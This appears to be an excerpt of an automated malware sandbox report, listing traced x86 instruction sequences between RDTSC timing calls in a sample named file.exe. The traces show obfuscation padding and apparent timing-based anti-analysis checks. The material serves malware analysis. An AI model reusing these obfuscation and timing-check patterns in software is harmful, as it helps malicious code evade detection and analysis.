Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008CC second address: 4A008F0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99FCCDC7E3h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dl, ah 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008F0 second address: 4A008F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008F6 second address: 4A008FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008FA second address: 4A00946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+3Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F99FD381EF3h 0x00000013 pushfd 0x00000014 jmp 00007F99FD381EF8h 0x00000019 adc si, 9DE8h 0x0000001e jmp 00007F99FD381EEBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00946 second address: 4A0095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0095E second address: 4A00962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00962 second address: 4A00A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b jmp 00007F99FCCDC7E7h 0x00000010 mov dword ptr [esi+40h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F99FCCDC7E4h 0x0000001a add cx, D5D8h 0x0000001f jmp 00007F99FCCDC7DBh 0x00000024 popfd 0x00000025 jmp 00007F99FCCDC7E8h 0x0000002a popad 0x0000002b lea eax, dword ptr [ebx+00000080h] 0x00000031 pushad 0x00000032 mov bx, si 0x00000035 call 00007F99FCCDC7DAh 0x0000003a pushfd 0x0000003b jmp 00007F99FCCDC7E2h 0x00000040 sub ecx, 415A1A98h 0x00000046 jmp 00007F99FCCDC7DBh 0x0000004b popfd 0x0000004c pop ecx 0x0000004d popad 0x0000004e push 00000001h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov ebx, ecx 0x00000055 pushfd 0x00000056 jmp 00007F99FCCDC7DCh 0x0000005b xor ah, FFFFFFF8h 0x0000005e jmp 00007F99FCCDC7DBh 0x00000063 popfd 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A26 second address: 4A00A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A2B second address: 4A00A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FCCDC7E5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99FCCDC7DDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A57 second address: 4A00B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 376B76D2h 0x00000008 jmp 00007F99FD381EF3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 mov ah, dl 0x00000014 call 00007F99FD381EF0h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007F99FD381EF7h 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 jmp 00007F99FD381EF6h 0x0000002b nop 0x0000002c pushad 0x0000002d jmp 00007F99FD381EEEh 0x00000032 pushfd 0x00000033 jmp 00007F99FD381EF2h 0x00000038 xor al, 00000008h 0x0000003b jmp 00007F99FD381EEBh 0x00000040 popfd 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007F99FD381EF9h 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F99FD381EEDh 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B1B second address: 4A00B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B21 second address: 4A00B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B4A second address: 4A00B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B65 second address: 4A00BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 call 00007F99FD381EEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edi, eax 0x00000010 pushad 0x00000011 movsx edx, si 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F99FD381EEAh 0x0000001d or eax, 76AF3CB8h 0x00000023 jmp 00007F99FD381EEBh 0x00000028 popfd 0x00000029 popad 0x0000002a popad 0x0000002b test edi, edi 0x0000002d jmp 00007F99FD381EF6h 0x00000032 js 00007F9A6E2B09F0h 0x00000038 pushad 0x00000039 mov dl, cl 0x0000003b pushfd 0x0000003c jmp 00007F99FD381EF3h 0x00000041 sbb cl, FFFFFFDEh 0x00000044 jmp 00007F99FD381EF9h 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr [ebp-0Ch] 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BFD second address: 4A00C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C01 second address: 4A00C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CFA second address: 4A00CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CFE second address: 4A00D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D41 second address: 4A00DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F99FCCDC7E6h 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 jmp 00007F99FCCDC7DEh 0x00000018 pushad 0x00000019 movzx esi, di 0x0000001c mov si, dx 0x0000001f popad 0x00000020 popad 0x00000021 js 00007F9A6DC0B10Dh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F99FCCDC7E0h 0x00000030 add ecx, 6644FDF8h 0x00000036 jmp 00007F99FCCDC7DBh 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DB0 second address: 4A00DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DB5 second address: 4A00DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DBB second address: 4A00DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DBF second address: 4A00E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e jmp 00007F99FCCDC7DEh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F99FCCDC7E0h 0x0000001b lea eax, dword ptr [ebx+70h] 0x0000001e jmp 00007F99FCCDC7E0h 0x00000023 push 00000001h 0x00000025 jmp 00007F99FCCDC7E0h 0x0000002a nop 0x0000002b jmp 00007F99FCCDC7E0h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E37 second address: 4A00E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E53 second address: 4A00E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99FCCDC7E5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E7A second address: 4A00E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E80 second address: 4A00E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E84 second address: 4A00E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E88 second address: 4A00E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 mov eax, 4AF3A813h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E9E second address: 4A00F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F99FD381EEBh 0x0000000c and al, FFFFFFFEh 0x0000000f jmp 00007F99FD381EF9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a mov eax, 25AA77E3h 0x0000001f pushfd 0x00000020 jmp 00007F99FD381EF8h 0x00000025 adc cl, 00000028h 0x00000028 jmp 00007F99FD381EEBh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F07 second address: 4A00F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F0B second address: 4A00F1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F76 second address: 4A00F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F7A second address: 4A00F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F7E second address: 4A00F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F84 second address: 4A00FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d jmp 00007F99FD381EF7h 0x00000012 js 00007F9A6E2B05E2h 0x00000018 pushad 0x00000019 jmp 00007F99FD381EF4h 0x0000001e mov ch, 6Bh 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp-14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FDA second address: 4A00FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FDE second address: 4A00FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FE2 second address: 4A00FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FE8 second address: 4A0100E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99FD381EEDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0100E second address: 4A0105E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F99FCCDC7DCh 0x00000013 sbb esi, 4B557B28h 0x00000019 jmp 00007F99FCCDC7DBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov edx, 759B06ECh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F99FCCDC7E0h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0105E second address: 4A01070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01070 second address: 4A01074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01074 second address: 4A010D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99FD381EEAh 0x00000014 or eax, 640E8FE8h 0x0000001a jmp 00007F99FD381EEBh 0x0000001f popfd 0x00000020 mov ah, 2Bh 0x00000022 popad 0x00000023 lock cmpxchg dword ptr [edx], ecx 0x00000027 jmp 00007F99FD381EEBh 0x0000002c pop edi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ebx, 6E097606h 0x00000035 call 00007F99FD381EF7h 0x0000003a pop eax 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010D3 second address: 4A010EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010EC second address: 4A010F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010F0 second address: 4A0117B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F99FCCDC7E3h 0x00000011 sbb ecx, 09BAFA9Eh 0x00000017 jmp 00007F99FCCDC7E9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F99FCCDC7E0h 0x00000023 and eax, 33E18C98h 0x00000029 jmp 00007F99FCCDC7DBh 0x0000002e popfd 0x0000002f popad 0x00000030 jne 00007F9A6DC0AD5Fh 0x00000036 pushad 0x00000037 mov ax, dx 0x0000003a popad 0x0000003b mov edx, dword ptr [ebp+08h] 0x0000003e jmp 00007F99FCCDC7DDh 0x00000043 mov eax, dword ptr [esi] 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov edi, 3DDDF20Eh 0x0000004d push ebx 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0117B second address: 4A011B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx], eax 0x0000000d pushad 0x0000000e movsx edi, cx 0x00000011 mov di, si 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 jmp 00007F99FD381EF6h 0x0000001d mov dword ptr [edx+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011B2 second address: 4A011B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011B8 second address: 4A01201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c jmp 00007F99FD381EF0h 0x00000011 mov dword ptr [edx+08h], eax 0x00000014 jmp 00007F99FD381EF0h 0x00000019 mov eax, dword ptr [esi+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cx, dx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01201 second address: 4A01206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01206 second address: 4A0122D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+0Ch], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99FD381EF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0122D second address: 4A01231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01231 second address: 4A01237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01237 second address: 4A012A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FCCDC7DCh 0x00000009 xor eax, 7F1BA538h 0x0000000f jmp 00007F99FCCDC7DBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+10h] 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F99FCCDC7DBh 0x00000022 add esi, 40040AFEh 0x00000028 jmp 00007F99FCCDC7E9h 0x0000002d popfd 0x0000002e jmp 00007F99FCCDC7E0h 0x00000033 popad 0x00000034 mov dword ptr [edx+10h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012A6 second address: 4A012AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012AA second address: 4A012B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012B0 second address: 4A012B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012B5 second address: 4A012D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99FCCDC7E8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012D9 second address: 4A012DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012DF second address: 4A01336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F99FCCDC7DCh 0x00000015 xor ch, FFFFFFE8h 0x00000018 jmp 00007F99FCCDC7DBh 0x0000001d popfd 0x0000001e mov esi, 458D49DFh 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+18h] 0x00000027 jmp 00007F99FCCDC7E2h 0x0000002c mov dword ptr [edx+18h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01336 second address: 4A0133A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0133A second address: 4A01340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01340 second address: 4A013A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007F99FD381EF0h 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 jmp 00007F99FD381EF0h 0x00000019 mov eax, dword ptr [esi+20h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F99FD381EEEh 0x00000023 or cl, 00000038h 0x00000026 jmp 00007F99FD381EEBh 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e mov si, A805h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013A6 second address: 4A01426 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2AE5BF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx+20h], eax 0x0000000d pushad 0x0000000e movzx ecx, di 0x00000011 pushfd 0x00000012 jmp 00007F99FCCDC7DFh 0x00000017 sbb eax, 7D4BDAAEh 0x0000001d jmp 00007F99FCCDC7E9h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+24h] 0x00000027 pushad 0x00000028 mov esi, 3E3E9BD3h 0x0000002d mov di, ax 0x00000030 popad 0x00000031 mov dword ptr [edx+24h], eax 0x00000034 jmp 00007F99FCCDC7E2h 0x00000039 mov eax, dword ptr [esi+28h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F99FCCDC7E7h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01426 second address: 4A01470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov edx, 37623AF6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+28h], eax 0x00000010 pushad 0x00000011 mov ebx, 5281B2CEh 0x00000016 pushfd 0x00000017 jmp 00007F99FD381EEFh 0x0000001c and cl, 0000007Eh 0x0000001f jmp 00007F99FD381EF9h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ecx, dword ptr [esi+2Ch] 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01470 second address: 4A014B7 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov eax, ebx 0x00000009 pushfd 0x0000000a jmp 00007F99FCCDC7DDh 0x0000000f add cx, 1066h 0x00000014 jmp 00007F99FCCDC7E1h 0x00000019 popfd 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [edx+2Ch], ecx 0x0000001f pushad 0x00000020 mov di, cx 0x00000023 mov esi, 5800CB8Fh 0x00000028 popad 0x00000029 mov ax, word ptr [esi+30h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A014B7 second address: 4A014CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A014CE second address: 4A0151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DFh 0x00000008 jmp 00007F99FCCDC7E8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov word ptr [edx+30h], ax 0x00000014 jmp 00007F99FCCDC7E0h 0x00000019 mov ax, word ptr [esi+32h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ch, bh 0x00000022 movzx ecx, dx 0x00000025 popad 0x00000026 rdtsc
